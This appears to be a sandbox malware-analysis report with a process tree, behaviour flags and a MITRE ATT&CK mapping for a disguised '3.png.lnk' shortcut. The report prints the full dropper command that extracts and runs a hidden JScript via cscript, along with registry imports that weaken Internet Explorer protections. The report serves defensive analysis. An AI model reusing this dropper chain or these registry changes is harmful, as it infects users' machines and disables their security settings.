PID 3824 wrote to memory of 1580	3824	cmd.exe	74
PID 3824 wrote to memory of 1580	3824	cmd.exe	74
PID 3824 wrote to memory of 3224	3824	cmd.exe	75
PID 3824 wrote to memory of 3224	3824	cmd.exe	75
PID 3224 wrote to memory of 1516	3224	cscript.exe	76
PID 3224 wrote to memory of 1516	3224	cscript.exe	76
PID 1516 wrote to memory of 3392	1516	cscript.exe	78
PID 1516 wrote to memory of 3392	1516	cscript.exe	78
PID 3392 wrote to memory of 988	3392	cscript.exe	82
PID 3392 wrote to memory of 988	3392	cscript.exe	82
PID 3392 wrote to memory of 1112	3392	cscript.exe	84
PID 3392 wrote to memory of 1112	3392	cscript.exe	84
PID 3392 wrote to memory of 1392	3392	cscript.exe	86
PID 3392 wrote to memory of 1392	3392	cscript.exe	86
PID 1564 wrote to memory of 4056	1564	iexplore.exe	89
PID 1564 wrote to memory of 4056	1564	iexplore.exe	89
PID 1564 wrote to memory of 4056	1564	iexplore.exe	89
PID 1564 wrote to memory of 1624	1564	iexplore.exe	91
PID 1564 wrote to memory of 1624	1564	iexplore.exe	91
PID 1564 wrote to memory of 1624	1564	iexplore.exe	91

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\3.png.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "3.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "3.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "3.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1416
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1580
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\System32\cscript.exe
      "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1516
    - - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3392
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.reg
        6⤵
        
        PID:988
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\mediaIE.reg
        6⤵
        Modifies Internet Explorer Automatic Crash Recovery
        Modifies Internet Explorer Phishing Filter
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        
        PID:1112
      - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        6⤵
        
        PID:1392

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1564 CREDAT:82945 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4056
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1564 CREDAT:82948 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads